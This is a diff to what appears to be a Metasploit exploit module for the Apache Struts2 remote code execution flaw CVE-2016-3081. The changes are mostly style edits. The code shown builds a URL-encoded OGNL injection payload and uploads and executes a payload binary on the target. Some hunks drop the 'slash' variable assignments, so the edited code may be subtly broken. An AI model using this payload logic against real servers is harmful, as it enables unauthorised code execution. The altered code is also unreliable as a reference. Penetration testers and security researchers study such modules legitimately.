@@ -29,7 +29,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2016-3081' ],
           [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
         ],
-        'Platform' => %w{java linux win},
         'Privileged' => true,
         'Targets' => [
           [
@@ -88,10 +87,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
       case get_target_platform
       when Msf::Module::Platform::Windows
-        slash = '\\'
+        '\\'
       when
-        slash = '/'
-      else
+        '/'
       end
 
       unless path.end_with?('/')
@@ -117,12 +115,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_rce_payload(code)
-    payload = "method:"
-    payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
-    payload << ","
+    payload = 'method:'
+    payload << Rex::Text.uri_encode('#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS')
+    payload << ','
     payload << Rex::Text.uri_encode(code)
-    payload << ","
-    payload << Rex::Text.uri_encode("1?#xx:#request.toString")
+    payload << ','
+    payload << Rex::Text.uri_encode('1?#xx:#request.toString')
     payload
   end
 
@@ -153,8 +151,8 @@ class MetasploitModule < Msf::Exploit::Remote
     var_a = rand_text_alpha_lower(4)
     var_b = rand_text_alpha_lower(4)
 
-    addend_one = rand_text_numeric(rand(3) + 1).to_i
-    addend_two = rand_text_numeric(rand(3) + 1).to_i
+    addend_one = rand_text_numeric(rand(1..3)).to_i
+    addend_two = rand_text_numeric(rand(1..3)).to_i
     sum = addend_one + addend_two
     flag = Rex::Text.rand_text_alpha(5)
 
@@ -181,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    payload_exe = rand_text_alphanumeric(4 + rand(4))
+    payload_exe = rand_text_alphanumeric(rand(4..7))
     case target['Platform']
     when 'java'
       payload_exe = "#{temp_path}#{payload_exe}.jar"
@@ -201,7 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoTarget, 'Unsupported target platform!')
     end
 
-    pl_content = pl_exe.unpack('H*').join()
+    pl_content = pl_exe.unpack('H*').join
 
     print_status("Uploading exploit to #{payload_exe}, and executing it.")
     upload_exec(command, payload_exe, pl_content)
